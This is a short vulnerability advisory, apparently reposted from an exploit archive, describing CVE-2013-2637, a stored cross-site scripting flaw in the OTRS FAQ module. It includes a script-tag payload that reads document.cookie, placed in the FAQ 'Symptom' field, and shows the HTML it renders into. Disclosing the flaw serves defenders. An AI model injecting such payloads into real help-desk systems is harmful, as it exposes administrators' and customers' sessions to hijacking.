id: 20630
date: 04/08/2013
title: OTRS FAQ Module - Persistent XSS
author: Luigi Vezzoso
cves: CVE-2013-2637

OTRS (http://www.otrs.com) is a flexible Help Desk and IT-Service Management Software distribuited as opensource project (AGPL License) and also as-a-service. WIth a 1,650,000 downloads and 110,000 installation is one of the most used ticketing and service management software in the world.
 
#VULNERABILITY DESCRIPTION
The FAQ Module permit to share FAQ documents to Admins (called Agents in OTRS), Customers and everyone. The documents are presented like a wiki. Each user with the permission of add a FAQ can create a custom FAQ with the exploit. Each user that can view that FAQ (also the admin) can trigger the XSS.
 
The user can add JavaScript in the "Syntoms" of FAQ like the simplest:  <script>alert("H4cked!!  "+document.cookie);</script>
 
 
--------------------------------------------------------------------------------
 <li class="Customer Visible">
                <div class="MessageHeader">
                    <h3>Symptom:</h3>
                    <div class="Clear"></div>
                </div>
                <div class="ArticleFAQContent">
                    <div class="message">
                        <script>alert("H4cked!!  "+document.cookie);</script>
                    </div>
                </div>
            </li>
--------------------------------------------------------------------------------

#  0day.today [2023-03-23]  #